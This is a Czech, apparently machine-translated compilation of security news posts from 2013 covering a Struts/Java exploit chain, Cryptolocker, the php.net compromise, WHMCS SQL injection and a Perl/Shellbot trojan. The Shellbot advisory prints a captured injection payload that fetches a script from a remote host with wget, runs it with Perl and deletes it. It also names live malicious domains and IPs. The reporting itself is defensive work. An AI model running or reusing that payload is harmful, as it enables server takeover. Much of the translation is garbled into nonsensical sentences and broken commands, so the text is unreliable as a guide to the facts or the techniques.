Zeptejte se sami sebe, že vaši uživatelé klepnutím na tlačítko?
Buďme opatrní, tam venku!
Internet široký DNS skenování
05.11.2013 Hacking | Počítačový útok
Obdrželi jsme žádost z výzkumné skupiny, aby všichni věděli, že budou provádět internetové širokou skenování serverů DNS. To je jejich žádost:
"Náš tým na síťových architektur a služby odbor (I8) TU München, Německo, zahájila DNS scan. To má podobné cíle jako prověřování, které jsme provedli pro SSL a SSH v uplynulých měsících. Opět platí, že Účelem je čistě vědecký. skenování Stroj je 131.159.14.42. jsme dotazování DNS servery k překladu názvů hostitelů. Nechceme žádným způsobem snaží ohrozit serverů. Kromě toho by se zatížení způsobené naší činností je velmi nízká na jednom serveru. Myšlenka našich dotazů je získat lepší pochopení vnitřního fungování DNS, jeden z nejvíce všudypřítomných protokolů internetu. bychom to ocenit to moc, pokud jste přidali komentář v databázi. Vezměte prosím na vědomí, že reagovat na každou stížnost, a jsou rádi, že blacklist systémy s otráveně adminy. "
Jejich účelem je vědecký výzkum. Zajímavý, říkám skenování bez svolení neetické a neslušné. Zde je to, co doporučuji, pokud nechcete být součástí výzkumu, který zablokovat všechny DNS dotazy z dané IP adresy. Oni provedli podobnou SSH a SSL prohlédnutí v minulosti z různých IP adres. Co si myslíte? Dejte nám vědět prostřednictvím našeho Kontaktujte nás stránky nebo v komentářích níže.
Buďme opatrní, tam venku!
Ochrana vaší rodiny počítače
05.11.2013 Ochrana | Bezpečnost
Jestliže vaši rodinní příslušníci jsou něco jako já, ve výchozím nastavení skončíš, že technická podpora pro celou rodinu jen proto, že jsou "techie" chlap (nebo holka) v rodině. Před několika lety jsem se stal frustrovaný tím, jak často se tato role stala odstranění škodlivého softwaru nebo znovu roli. Ačkoli nejsou tam žádné stříbrné kulky, aby se zabránilo počítače z nakažení, jsem přišel s standardní konfiguraci, že jsem se na všechny mé rodiny počítačů podstatně snížit pravděpodobnost závažné infekce. Jsem neustále vylepšil ji v průběhu let, ale tady je můj současný standard stavět:
Malware Protection
Antivirus se rychle stává irelevantní v současném světě malware, ale nemyslím si, že jsem ochoten jít, aniž by to ještě. Existuje několik volných antivirových programů k dispozici, a já jsem se snažil většinu z nich, ale v posledních několika letech Microsoft Security Essentials je ten, který jsem obvykle nainstalovat pro rodinné použití. Já nevím, jestli je to účinnější než alternativy, ale zdá se dělat svou práci, a to nezaniká pravidelně a nechat stroj bez ochrany. Nezapomeňte odinstalovat zkušební antivirový software, který je dodáván téměř na každém počítači. Dva antiviry běžící na stejném počítači zřídka vyjít.
Bezpečného prohlížení
Dlouho jsem došel trpělivost aplikaci Internet Explorer. Pro rodinné počítačů dám jim na výběr mezi Firefox nebo Chrome. Moje rodina nejsou technické lidé. Nemají znalosti soudit dobré spojení z jednoho škodlivého. Díval jsem se na mnoha rozšířeními, jak snížit pravděpodobnost, že se nakazit při surfování na internetu. Nakonec jsem se usadil na pouze dva: Web of Trust (WOT) a Adblock Plus. Nainstalovat Web of Trust (WOT), takže alespoň pokud se snaží jít do špatné stránky, které se varování. I Nainstalujte Adblock Plus, aby se snížila pravděpodobnost infekce z nebezpečného reklamy. Má také tu výhodu, urychlení prohlížeče zážitek některých místech.
Použil jsem k instalaci doplňku NoScript, ale zjistil, že je příliš složité pro mé průměrného člena rodiny. Také jsem experimentoval s SSL všude. Jsem se přidal do nástrojů, ale jsem asi bude v blízké budoucnosti.
Aktuální aplikace
Posledním nástrojem v krabici je Secunia Personal Software Inspector (PSI). PSI je zdarma pro nekomerční domácí použití, verze Corporate Software Inspector (CSI). Jeho funkcí je skenování počítače, jaký software je nainstalován a udržet většinu programového vybavení, až do dnešního dne. Ačkoli PSI bude automaticky udržovat většinu software aktuální, bude nějaký software vyžaduje manuální zásah, aby zůstali až do dnešního dne, takže budete muset trénovat vaše rodina trochu zvládnout těchto instancí.
Tak to je moje toolkit. Snažím se vždy najít na zlepšení. Co je tvoje?
- Rick Wanner MSISE - rwanner na isc sans dot dot EDU - http://namedeplume.blogspot.com/ - Twitter: namedeplume (chráněné)
Secunia PSI je Country Report - Q3 2013
05.11.2013 Analýzy
Na paty diskutovat Microsoft Security Intelligence Report V15 , kde je zřejmé, stánek s jídlem, Secunia je právě vydala "Windows XP je pryč!" PSI Country Report - Q3 2013 je zajímavý doplňkový čtení. Zde jsou souhrnné údaje:
Nainstalované programy: 75 , od 25 různých výrobců
40% (30 z 75) z těchto programů jsou Microsoft programy
60% (45 z 75) z těchto programů jsou od dodavatelů třetích stran
Uživatelé s neopravených operačních systémů: 14,6% (WinXP, Win7, Win8, Windows Vista)
Neopravených programy třetích stran, na prům. PC: 10.7%
Neopravených MS programy: 4,1%
End-of-Life programy na průměrné PC již opravené prodejce: 3,9%
Obzvláště zajímavé: "Ve Spojených státech, 79% uživatelů PC, kteří používají Secunia PSI měl Microsoft XML Core Services nainstalována ve 3. čtvrtletí 2013 50% z těchto uživatelů nebyla oprava programu, i když oprava je k dispozici To znamená, že odhadované.. 39,5% ze všech počítačů v USA jsou zranitelní MSXML 4 ". Dejte souvisejících Secunia blog post na čtení pro více informací, jak, proč. Pak dostat se na záplatování a odstranění této EOL software, lidi. :-
McAfee Labs Detekuje zero-day exploit cílení Microsoft Office
05.11.2013 Exploit | Zranitelnosti
Minulý čtvrtek ráno (31. října), naše Rozšířené Exploit Detection System (AED), které jsme zmínili v předchozí post , zjistil podezřelý vzorek cílení Microsoft Office. Po nějaké vyšetřování, jsme potvrdili to zero-day attack.
S ohledem na význam této události, jsme sdíleli naše zjištění okamžitě Microsoft Security Response Center a úzce s nimi v posledních pár dnech. Dnes, stejně jako Microsoft veřejně vydala informační zpravodaj zabezpečení se zmírňování a řešení, cítíme, že je čas podělit se některé detaily tohoto zero-day útoku.
Zde je doprava zachycena tímto útokem na plně aktualizovanou verzi sady Office 2007 se systémem Windows XP SP3.
traffic1
Jak můžeme vidět, po úspěšném vykořisťování exploit stáhne spustitelný soubor (uložen na C: \ Documents and Settings \ \ Local Settings <username> \ Temp \ winword.exe ) z kontrolovaného webového serveru .
Spustitelný soubor je vlastně RAR SFX obsahující další spustitelný soubor a falešný dokument aplikace Word. Jiný spustitelný soubor (klesl na C: \ Documents and Settings \ \ <username> Updates.exe ) je backdoor umožňuje útočníkovi převzít kontrolu nad počítačem oběti. Falešný dokument (klesl na C: \ Documents and Settings \ \ <username> Shanti.doc ) se odebere oběti hned po úspěchu vykořisťování, je to společný post-těžba trik, který se snaží zabránit obětem z vědoma tohoto útoku.
Zero-day exploit vzorek je organizována jako OpenXML formátu Word (. Docx). Pozorovali jsme mnoho objektů ActiveX obsažených v "ActiveX" adresáři po rozbalení. Souboru DOCX. To naznačuje, že exploit používá ovládací prvek ActiveX sprej haldy paměti.
activex_spray1
Je třeba poznamenat, že tato haldy postřik Office přes objekty ActiveX je nová těžba trik, který jsme neviděli předtím, dříve útočníci obvykle vybral Flash Player sprej paměti v sadě Office. Jsme přesvědčeni, že by se nový trik byl vyvinut pod pozadí, které Adobe představila click-to-play funkce v aplikaci Flash Player měsíci, který v podstatě zabil tu starou. To je další důkaz toho, že útočí na techniku se vždy snaží vyvíjet, když ty staré už nefungují.
Jak se ukazuje, byly meta data ze souborů nastaven na 17 říjnu 2013, který může navrhnout čas vytvoření tohoto exploitu (i když může být falešný meta čas).
A to je místo, které EIP je řízen na stříkaného paměti 0 × 08080808.
eip_control_windbg_hidden21
Když už mluvíme o zranitelnosti prosazeny tímto útokem, když jsme spatřili útok provádí pomocí Office 2007 v systému Windows XP, je to vlastně chyba existuje ve TIFF zpracování komponenty dodávané se sadou Microsoft Office. Proto jsou nejen Office 2007 v systému Windows XP zranitelné vůči tomuto útoku, ale i další prostředí jsou touto chybou zabezpečení ohroženy. Navíc, naše pozdější výzkum ukázal tento exploit funguje i na Office 2007 provoz na Windows 7. Rádi bychom naznačují, že čtenáři se podívat na místo SRD blog , kde se podělili o přesné ovlivněným prostředím a výhled z pohledu dodavatele. Labs aktivně pracuje na získání každý kus podrobnosti o této zneužití, můžeme sdílet naše další zjištění v blízké budoucnosti.
Naše AED nadále sleduje pokročilých hrozeb, jako zero-day exploity a apts po celém světě, v rámci našich závazků k ochraně našich zákazníků z dnešních rychle se rozvíjejících útoků.
Pro zákazníky společnosti McAfee, jsme vydali NIP podpis " UDS-ShantiMalwareDetected "minulý pátek dodat ochranu v předstihu, náš HIPS produkt je schopen detekovat tento útok bez jakékoli aktualizace.
Díky Bing Sun, Chong Xu, Xiaoning Li (Intel Labs) a Lijun Cheng za jejich tvrdou práci na exploitu analýzy, stejně jako IPS detekcí. Guilherme Venere a Abhishek Karnik také přispěl z anti-virus straně.
Mobilní malware používá v kampani proti sabotáži hackerů na Středním východě
05.11.2013 Viry | Mobil
Po četných pokusech sabotovat Oct26 řidičský kampaně on-line, opakovaným hackování stránek / účtů, jakož i znehodnocení internetových stránek, které zahrnovaly oficiální internetové stránky pro kampaň hxxp :/ / www.Oct26driving.com dvakrát v rozpětí několika dní. Další pokusy vykolejit pohybu jsou nyní přichází na světlo. Hacker (y) neodradí pouhým aktem znehodnocení lokalit také vytvořili a vydali malware k šíření svého poselství. Jedním takovým příkladem je objev McAfee Mobile Security v Android / HackDrive.
Oct26thMobileMalware
Malware byl přestrojený za app na podporu online kampaň, i pomocí ikony, která se stala symbolem pohybu 26.října Driving kampaně, ale ve skutečnosti byl navržen tak, aby rozšířil stejnou nenávistnou propagandu, která byla umístěna na hacknutý / Znehodnocené stránky to byl distribuován od.
Na instalaci malware aktivuje, jakmile byla sluchátka zapojená Rozjezd o rušení zvuku opakovaným přehráváním předdefinované zvukové sekvence, takže je možné poslouchat cokoliv jiného na zařízení nebo provádět telefonní rozhovor, hrozba také zobrazuje další zprávy v arabském textu podobně jako zprávy používané v hacknutý internetových stránkách.
Kupodivu tam byl další funkce vytyčil v škodlivého kódu. Aplikace měl možnost projít databázi kontaktů hledají jména, telefonní čísla na infikovaného zařízení, doprovází to schopnost, aby data byla zaúčtována do vzdálené webové stránky, ale kupodivu i když tam byl kód, aplikace ne ve skutečnosti Vyzýváme funkčnosti. To vyvolává otázku, je tato práce probíhá a bude novější verze mají další funkce.
Na povrchu dovádění používané v aplikaci a na webových stránkách zašpinění se může zdát pro mladistvé, ale nenechme se mýlit, je to nenávist a nedotýká se projevuje do app. McAfee pozorně sleduje situaci pro další rozvoj a vyzýváme uživatele vykonávat opatrnosti při pokusu stahovat žádný software, který je svázán s žádnou politickou nebo aktivista kampaně.
Cryptolocker podvodníci nabízejí obětem druhou šanci
5.11.2013 Viry
Zločinci stojí za Cryptolocker, destruktivní Ransomware, který v poslední době zaměřuje většinou americké a britské uživatelů PC, se snaží vydělat více peněz tím, že nabízí uživatelům, kteří původně rozhodl, že platit za jejich soubory dešifrovat šanci změnit svůj názor. Jak Možná si vzpomenete, Cryptolocker je zaměřena na organizace, místo domácích uživatelů, protože šifruje soubory, s největší pravděpodobností mít zásadní význam pro organizace, jako jsou kancelářské soubory, soubory s digitálním certifikátem, AutoCAD soubory, atd, a e-mailové kampaně dodává, že podporuje tuto teorii. "Pro každý soubor odpovídající jeden z těchto modelů bude malware vygenerovat nový 256 bitového klíče AES. Tento klíč pak bude použit k zašifrování obsahu souboru pomocí algoritmu AES, "vědci vysvětlit , kdy byl poprvé objeven malware. " AES klíč je pak zašifrován unikátní veřejný klíč RSA získané dříve. Jak RSA šifrovaný AES klíč, stejně jako AES šifrovaný obsah souboru spolu s některými dalšími informacemi hlavičky jsou pak zapsány zpět do souboru. V neposlední řadě se malware přihlásit šifrování souboru ve HKEY_CURRENT_USER \ Software \ CryptoLocker \ Files klíče registru. Tento klíč je později používán malware předložit seznam šifrovaných souborů pro uživatele a pro urychlení dešifrování. " Bohužel pro uživatele, RSA veřejný klíč vytvořený pro jejich systém je pouze známo, že útočníky, protože je uložen na C & C serveru malware nahrál na, a uživatelé jsou vyzváni k zaplacení 300 dolarů / euro (nebo 2 Bitcoiny), aby ji přijmout. Nabídka obvykle znamená po dobu 72 hodin, po které se podvodníci tvrdí, klíč se smaže navždy. Ale podle Paula Ducklin , který mohl být planá výhrůžka, jak podvodníci nyní nastavit CryptoLocker dešifrování služba, kde obětí Můžete nahrát jeden ze svých šifrovaných souborů a čekat na zločince oznámit, pokud je jejich klíč naleznete. Pokud je možné, uživatel bude muset zaplatit ještě větší cenu.: 10 Bitcoiny (v současné době kolem 2220 dolar) Zda toto "service" skutečně funguje a zda podvodníci pošle klíč v případě, že oběť se rozhodl zaplatí neznámé. Nejlepší zmírnění proti nepříznivým účinkům Cryptolocker a Ransomware obecně může mít na vašem počítači je stále pravidelně aktualizovat vaše důležité soubory.
Exploit koktejl (Struts, Java, Windows) jít po 3-měsíc staré zranitelnosti
5.11.2013 Exploit | Zranitelnosti
Když ISC čtenář Yin hlášeny dneska, že jeden z jejich servery byly hacknutý přes Apache Struts provádění příkazů dálkového zranitelnosti (CVE-2013-2251), zpočátku to bylo označeno jako "business as usual". Řekl zranitelnost, po tom všem, je znám od července, a my jsme byli svědky pokusů Exploit od začátku srpna (deník zde ). Tak to bylo docela překvapení vidět unpatched internet exponované serveru podkopána. Vzhledem k tomu, nekontrolovatelný skenování, bylo to víc překvapující, že to přežil bez úhony až do současnosti.
V důsledku úspěšného útoku, zločinci změnit základní index.jsp na ohrožený server, který zahrnuje fragment, jako je následující:
Související stránky jsou stále ještě žijí, což je důvod, proč je výše uvedený obraz a není klikací URL. Pokud stále trvají na tom, jít hledat, buďte opatrní a neobviňujte nás! Opuštění webový server a Struts zranitelnosti aspekt věci, pojďme se nyní podívat na to, co číhá na tom Namu-v místě:
Jo, je tu APPLET tag. Zneužití Java opět, zdá se. Oracle Java je skutečný dar, který udržuje na to, aby ...!
daniel @ foo3: ~ / malware $ ls-al Init.jar
-rw-r - r - 1 daniel uživatelů 49019 24.října 16:04 Init.jar
daniel @ foo3: ~ / malware $ md5sum Init.jar
714ef7f35f2bac61c4bace8706f88b98 Init. skřípat
daniel @ foo3: ~ / malware $ unzip Init.jar
Archiv: Init.jar
nafukování: META-INF/MANIFEST.MF
nafukování: Print.class
nafukování: Init $ MyColorModel.class
nafukování: Init $ MyColorSpace.class
nafukování: Init.class
Přítomnost "MyColorModel" a "MyColorSpace" souborů v archivu JAR naznačuje, že by to mohlo být exploit pro CVE-2013-2465, 2D/AWT chyba, která ovlivňuje všechny Javy až 1.7_21. Při bližším zkoumání, je to potvrzeno, Init.class skutečně využívá CVE-2013-2465 a pak zavolá Print.class, což se zdá, vytvořte soubor s názvem "mspaints.exe":
Obsah souboru je čerpána z proměnné "data" nebo "data1", v závislosti na verzi operačního systému setkal. Obě tyto proměnné jsou definovány v "Print.class":
Sekvence 7777 ... jsou docela vzácné, v reálném světě EXE. Příslušné série nul (00), by bylo mnohem běžnější. A podívejte se, jak se soubor začíná "3A2D" .. pokud je to opravdu EXE, pak tyto první dva bajty by musel být "MZ" (5A4D). Takže .. tato "data" Pole je asi jen XORed s 0x77? Zkusme:
daniel @ foo3: ~ / malware $ echo "3A2D" | perl-pe 's / (..) / chr (hex ($ 1) ^ 0x77) / ge "
MZ
Busted! :)
Krmení celé dva "data" pole pomocí stejné operace Perl změní hexadecimální sadu do binárních souborů, to vše při XOR-ing každý byte s 0x77: daniel @ foo3: ~ / malware $ cat data.hex | perl-pe 's / (..) / chr (hex ($ 1) ^ 0x77) / ge "> data.exe daniel @ foo3: ~ / malware $ file data.exe data.exe: PE32 executable pro MS Windows (GUI) Intel 80386 32-bit daniel @ foo3: ~ / malware $ md5sum data.exe cd2dd181257375c840f13988c8c7b6d5 data.exe
Hledání této MD5 hashi na VirusTotal https://www.virustotal.com/ # hledání nám dává výsledek s poněkud ponuré 3/47 objasněnosti. Ale aspoň někdo už nahrál dřív.
V další fázi analýzy je nyní na dva EXE soubory, data.exe a data1.exe. Tento úkol je - obecně - o dost složitější než jen reverzní inženýrství JavaScript nebo Java, protože statická analýza (jako my na applet), může být docela spolehlivě zmařeny na EXE a dynamické analýzy (= skutečně spuštěním souboru) může být plný překvapení "." Názorný příklad:
daniel @ foo3: ~ / malware $ strings data.exe | grep-i ladění
OutputDebugStringA
IsDebuggerPresent
Vypadá to, že náš EXE vyvolá Windows API metoda "IsDebuggerPresent" ověřit, zda debugger je právě spuštěn. Je pravděpodobné, že bude EXE chovat jinak, pokud je podezření, že někdo (jako malware analytik :) sleduje každý jeho pohyb. V tomto případě zde je nicméně docela snadno možné zjistit, co tyto dva EXE dělají: Jsou, jak to tak bývá, jednoduše "stahují", které načíst další fáze útoku kódu. K dispozici jsou čtyři stažené soubory a všechny pocházejí z www-sandulsori-CO-KR.
daniel @ foo3: ~ / malware $ ls-al *
-rw-r - r - 1 daniel uživatelů 55296 24.října 12:21 common.gif
-rw-r - r - 1 daniel uživatelů 71680 24 říjen 12: 21 common.png
-rw-r - r - 1 daniel uživatelé 21.října 7680 08:08 favicon1.ico
-rw-r - r - 1 daniel uživatelů 79872 17.října 09:44 favicon.ico
daniel @ foo3: ~ / malware $ md5sum *
e2004ec5fef378b2e41f6eef6931650b common.gif
3fed1004befb9834b699a88ccdce757e common.png
c85f70642ad402077c6447dc6ad6f7bb favicon1.ico
93a2dc2dcdb4bb17ae168cb60cff2e9b favicon.ico
daniel @ foo3: ~ / malware $ file *
common.gif: PE32 executable pro MS Windows (konzole) Intel 80386 32-bit
společné . png: PE32 + spustitelný soubor pro MS Windows (konzole) Mono / NET assembly
favicon1.ico: PE32 executable pro MS Windows (GUI) Intel 80386 32-bit
favicon.ico: PE32 executable pro MS Windows (DLL) (GUI) Intel 80386 32-bit
Všimněte si, jak všechny čtyři soubory tvrdí, že obraz, i když jsou EXE. Dva soubory s názvem "obyčejný" obsahovat EPathObj Windows exploit (CVE-2013-3660), což má za následek oprávněními SYSTÉMU ve verzích systému Windows, které nemají opravu MS13-053 (červenec 2013). Analýza dvou favicon soubory stále probíhá. Zúčastněné domény (celkově) jsou: www-Namu-in-com, v současné době 110.45.165.42 pro etapu # 1 www-sandulsori-ko-kr, v současné době 111.92.188.21 pro etapu č. 2, a www-staticscount-com , v současné době 74.82.173.187 pro Command & Ccontrol (C & C). Tyto stránky a IP bloky nejsou nutně nepřátelské samo o sobě, mohou být také oběťmi dřívější hack / převzetí.
Ponaučení z příběhu je, že všechny výše uvedené je založena na využije zranitelnosti, které záplaty jsou k dispozici od roku asi tři měsíce. Pokud váš záplatování operačního systému a aplikace zaostává v této míře z důvodu nedostatku finančních prostředků nebo prioritní, budete muset dohnat co nejdříve. Jak je uvedeno výše, protivníci přinášejí využít koktejly, které poskytují oprávnění na úrovni systému na počítačích s Windows, které nemají potřebné záplaty a aktuální antivirové vzory nabízejí malou ochrany proti ní.
SIR v15: Pět dobrých důvodů, proč opustit Windows XP za sebou
5.11.2013 Zabezpečení
Ne, není to proto, že pracuji pro MSFT a chcete upgradovat ze sobeckých důvodů. :-) Je to proto, že opravdu je čas.
Pokud potřebujete silný podpůrný argument a pět dobrých důvodů pro upgrade, nehledejte nic jiného než Microsoft Security Intelligence Report V15 byla dnes zveřejněna. Vše, co musíte udělat, je CTRL + F a to doc hledání pro systém Windows XP, co mluvím. Tady, pomůžu ti, jak roztrhl directy z SIR V15:
9.1 vyčistit počítače za 1.000 zkontrolován pro odebrání nebezpečného softwaru (MSRT) byly Windows XP SP3 32-bit, více než kterýkoliv jiný systém vyčistit.
Windows XP SP3 drží první místo pro míře infekce (9,1 CCM), i když ve skutečnosti má nižší frekvenci (Encounter procent hlášení počítače) než Windows 7 SP1.
Rozdíl mezi těmito dvěma metriky nad zdůrazňuje význam přechodu od starších verzí operačního systému na novější, bezpečnější ty. Počítače se systémem Windows XP v první polovině roku 2013 se setkal asi 31 procent více malwaru než celosvětový počítačů se systémem Windows 8, ale jejich výskyt infekce byl více než 5x vyšší.
# 1 hrozbou rodina ovlivňuje Windows XP SP3? INF / Autorun . Ano, to autorun, používá červy, když se šíří do lokální, síťové nebo vyměnitelné jednotky. Nefunguje na moderních verzích Windows v jejich výchozí konfiguraci.
Windows XP rozšířené podpory končí 08.4.2014. To znamená, že již více náplastí, lidi.
Jak jsem seděl v zubní křesla dnes pro mou čištění a prohlížet moje rentgeny na stroji s Windows XP jsem si myslel o komentář od Rains Tim důvěryhodných Microsoft Computing organizace: "XP byl milovaný operační systém pro miliony a miliony lidí po celém světě, ale po 12 letech služby, že prostě nemůže zmírnit hrozby Vidíme novodobí útočníci používají. " Míra přežití pro systémy Windows XP po konci podpory? Neexistující. Nevěříte mi? Také na Tima: "V následujících dvou let po Windows XP Service Pack 2 se vydali podpory, její malware infekce bylo 66 procent vyšší, než Windows XP Service Pack 3 - poslední podporovaná verze systému Windows XP."
Je čas, přátelé. To bude těžké pro lékaře a zubní lékaře, které mají být jistý :-), ale stěhování je v pořádku. Co by řekl Patton (díky TJ )? " násilné proveden plán dnes je lepší než perfektní plán očekává příští týden. " To by mělo být váš plán pro migraci mimo systém Windows XP.
Yet Another WHMCS SQL Injection Exploit
5.11.2013 Exploit | Hacking
Update: Patch byl propuštěn minulou noc. Viz http://blog.whmcs.com/?t=80223
WHMCS, populární fakturace / support / zákaznický systém, stále trpí kritických problémů SQL injekce. Dnes, ještě další zranitelnosti, včetně zneužití byl propuštěn.
Vzhledem k tomu, že neexistuje žádná oprava k dispozici na tomto místě budu zdrží propojení všech Exploit detailů, ale je to dost triviální najít odpovídající blogu, který obsahuje skript, který zneužít tuto chybu zabezpečení. WHMCS uznal problému [1]
Hlavní příčinou tohoto problému, stejně jako předchozí problémy se softwarem, se zdá být nedostatek v chápání řádné kontroly, aby se zabránilo SQL injection. Dobrý ověřování vstupu je jen začátek, ale připravené příkazy jsou nutností. Místo toho, WHMCS vývojáři používají poměrně složité (a buggy), funkce uniknout uživatelský vstup a montujeme dynamických SQL dotazů.
Chyba je ve funkci, používané v celé Whmcs, je tak exploit není omezen na konkrétní URL.
[1] http://blog.whmcs.com/?t=80206
CSAM - Proč jsem viděl DNS Žádosti o IANA.ORG v mém Firewall Logs?
5.11.2013 Hacking | Zabezpečení
Jako součást Cyber-Security Awareness měsíce, jeden z našich čtenářů poslal nás výpis z jejich záznamu pro firewall. Události zájmu, kde pravidelný vzor interní hostitele dělat DNS dotazy do několika počítačů na iana.org.
Takže jinými slovy, tisíce odchozí DNS dotazy na internetových hostitelů, kteří nejsou v každém DNS nebo DHCP konfigurace uvnitř organizace. Co s tím? po chvilce hledání jsme našli odpověď v RFC6304 a RFC6305, také http://support.microsoft.com/kb/259922. Já hlavně jako název RFC6305 je - " ! jsem byl napaden PRISONER.IANA.ORG " V prostém anglicky, když nemáte reverzní DNS zóny zřízené pro vaše interní podsítí, bude každý jednotlivec stanice pokusí zaregistrovat reverzní záznam s těmito hostiteli na IANA. Je to jen část toho, jak je dále navržen DNS, není to k žádnému konkrétnímu výrobce operačního systému (takže to není "věc okna"). řešení? Konfigurace reverzní DNS zóny pro každou zónu uvnitř vaší organizace.
Zatímco reverzní DNS zóny mají velký aplikací pro penetrační testery, ale jsou také velmi * * vhodné pro mnoho "důvěryhodně" důvodů:
To vám pomůže identifikovat hostitelů z IP adres, které by mohly ukázat ve vašem firewallu a dalších protokolů (to je jeden velký)
Pomáhá při definování Active Directory "webů", který bude na oplátku umožní optimalizovat dotazy Domain Controller typu. Například, vytváření webů pro každého vzdáleného umístění kanceláře v organizaci umožňují pracovním stanicím autentizovat řadičů domény ve své místní pobočce, než ožvýkají WAN pásma na ověření proti řadičů domény v ústředí.
Přístup byl odepřen a blacklisty / blocklists
5.11.2013 Bezpečnost | Hacking
Pokud jste surfování na internetu, hlídat své vlastní podnikání a získat přístup odepřen zprávu, můžete pochopitelně zajímalo, proč. Jako jeden Internet surfař zjistil, že se snažil jít na legitimní webové stránky, aby si služby v zemi hodlal na návštěvě. Představte si jeho překvapení, když vidí na obrázku níže ve svém webovém prohlížeči!
Hmm, co by to mohlo znamenat? Kdybych byl na jeho místě bych se pokusit kontaktovat Dshield. Je to skoro, jako kdyby byla společnost pomocí blacklistu nebo blocklist, že tento uživatel byl uveden na jiné lidi tím, že útočí na internetu. Jako obslužné SANS Internet Storm Center máme přístup k Dshield databázi a mohou dotazovat jej. Naše doporučená blok seznam je veřejný a nachází se zde:
https://isc.sans.edu/block.txt
Nicméně IP adresa naší webové surfař není na tomto seznamu. Dotaz na Dshield se výsledek v některých hitů, ve skutečnosti existuje 9, vše z 11. října na portu 80. Ne tak docela agresivní útočník hacking si cestu přes internet. Můj odhad by byl kliknutím na neplatné odkazy, kde býval webové servery, což vede ke zprávám snížil provoz z dané IP adresy.
Co víme je, že určité dodavatele, který musí zůstat bezejmenní v současné době je využití Dshield data nesprávně a nevhodně, a oni by měli přestat. Máte-li poznat tuto chybovou zprávu víte, kdo jste. Pokud využijete této dodavatelé zařízení nebo softwaru na vědomí, že to, co jste funkci zapnutý blokuje zcela nevinné uživatele se snaží koupit své služby. To nečiní nic víc bezpečnější vůbec. Nejsem rád blocklists nebo černých listin vůbec, a to zneužití není nijak zvlášť dobrý nápad.
Buďme opatrní, tam venku!
Kaspersky vlajky TCPIP.SYS jako malware
5.11.2013 Viry
Jeden z našich čtenářů se nás upozornil na skutečnost, že Kaspersky AV označil Tcpip.sys jako malware na svých Windows 7 32bit hostitelů - je soubor označen jako " HEUR: Trojan.Win32.Generic "
Naštěstí Microsoft Windows funkce Ochrana souborů (http://support.microsoft.com/kb/222193) jej z karantény tento kritický soubor, ale jeho koncoví uživatelé byli léčeni na chybové zprávy (oba z AV a od OS Hádám)
Jeho verze Kaspersky je Checkpoint OEM verze, ale zdá se, že problém Kaspersky, ne Checkpoint specifické.
Kaspersky ověřil (https://twitter.com/kaspersky/status/393777843341393920), že je to vyřešeno v poslední aktualizaci. Vidíte-li tento problém vyřešit, získejte AV na "volat domů" pro opravy!
Falešně pozitivní: php.net Malware upozornění
5.11.2013 Viry
Aktualizace: Barracuda zaslali podrobnější analýzu a zachycování paketů o tom, že php.net mohla být skutečně compromissed a vydal škodlivý flash soubor: http://barracudalabs.com/2013/10/php-net-compromise/ (thx David pro poukazuje na to)
Dneska, Google měl php.net přidal do svého seznamu škodlivých stránek. Seznam byl výsledek falešně pozitivní spouští obfuscated soubor JavaScriptu, který je legitimní součástí webu php.net. V tomto bodě, falešně pozitivní se zdá být vyřešen.
Je smutné, že Google je notoricky pomalý při odstraňování falešných poplachů takhle. Pomáhá v případě, že správce stránek je podepsán s Google Webmaster Tools. V tomto případě může být žádost o přezkoumání se podává prostřednictvím Nástrojů pro webmastery a správce bude informován prostřednictvím e-mailu, pokud je přidán web na černou listinu.
Pro více informací viz:
https://productforums.google.com/forum/ #! topic/webmasters/puLmvjtK0m8% 5B1-25-false% 5D
PHP.net kompromis Následky: Proč Beats podepisování kódu hash
5.11.2013 Hacking | Incidenty
Včera bylo zjištěno, že php.net web byl ohrožen. V tomto bodě, tým php.net věří, že servery byly ohroženy na několik dní, a alespoň jeden soubor byl změněn dodat malware. Aktuální přehled naznačuje, že útočník může mít přístup k serverům tajným klíčem SSL, což naznačuje, že útočník měl roota. [1]
Pravděpodobně nejcennější aktivum přítomen na místě, a to php.net zrcadla je PHP zdrojový kód distribuce, která je používán na místech po celém světě. V tomto bodě, nic nenasvědčuje tomu, že útočník upravený soubor. Ale chci se zaměřit na uživatele, stahování souborů, stejně jako zdrojový kód PHP. Jak si ověřit, že soubor je závazné a ani se s ním manipulovala?
PHP.net vydává MD5 hashe na svých stránkách, které uživatel může použít k ověření binární. Nevadí, že MD5 není nejsilnější algoritmus hash. Je to asi dost dobré pro tento účel. Skutečným problémem je, že neexistuje žádný digitální podpis. Útočník by mohl vyměnit zdrojový kód a MD5 hashe, pokud má útočník přístup k serveru, a stejně jako v tomto případě appeareantly je schopen měnit soubory. Digitální podpis by být vytvořeny pomocí tajného klíče daleko od serveru, možná i stále offline. Tímto způsobem by útočník schopen změnit podpis, ale nepoužíváte autorizovaný klíč a koncový uživatel trápí ověření digitálních podpisů bude mít určitou šanci detekovat kompromis. Je smutné, že příliš mnoho projektů, pouze hash (opět: nezáleží na tom, hash použít vše může být nahrazen.).
[1] http://php.net
Aktivní Perl / Shellbot Trojan
5.11.2013 Viry
ISC obdržela podání od Zacha z Perl / Shellbot.B trojan jemuž fallencrafts [.] Info / download / himad.png [ 1 ]. Trojan má omezený detekce na VirusTotal [ 2 ] a skript obsahuje "hostauth" z sosick [.] net [ 3 ] a IRC server, na kterém ohroženy systémy, které se připojujete, nachází na 89.248.172.144. To, co máme tak daleko, zdá se, že je využívá starší verze Plesk.
Aktualizovat
Tento Bot zneužít zranitelnost v Horde / IMP Plesk webmail, možná budete chtít zkontrolovat systémové protokoly známky serveru se mohou připojit k odchozí fallencrafts [.] Informace, které se zdá být využití Plesk [ 4 ] zranitelnost a možná další připojení do 93.174.88.125 kterém hodně aktivity byly hlášeny DShield za poslední 3 dny.
26.října 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 na localhost: 143 [imap / notls] a <php passthru ("cd / var / tmp, cd / var / tmp, wget http?: / / fallencrafts.info / download / himad.png, perl himad.png, rm-rf himad.png * ");?> @ xxxxxxxxx.net [on line 258" / usr / share / PSA Horde / Imp / lib / Auth / imp.php "]
Pokud je systém napaden, budete pravděpodobně uvidí podobné procesy Apache:
apache 10760 0.0 0.0 1084 10816? S 11:09 0:00 sh-c cd / var / tmp, cd / var / tmp, wget http://fallencrafts.info/download/himad.png, perl himad.png, rm-rf * himad.png
apache 10761 0.0 0.0 1392 42320? S 11:09 0:00 wget http://fallencrafts.info/download/himad.png
md5: bca0b2a88338427ba2e8729e710122cd himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9 himad.png
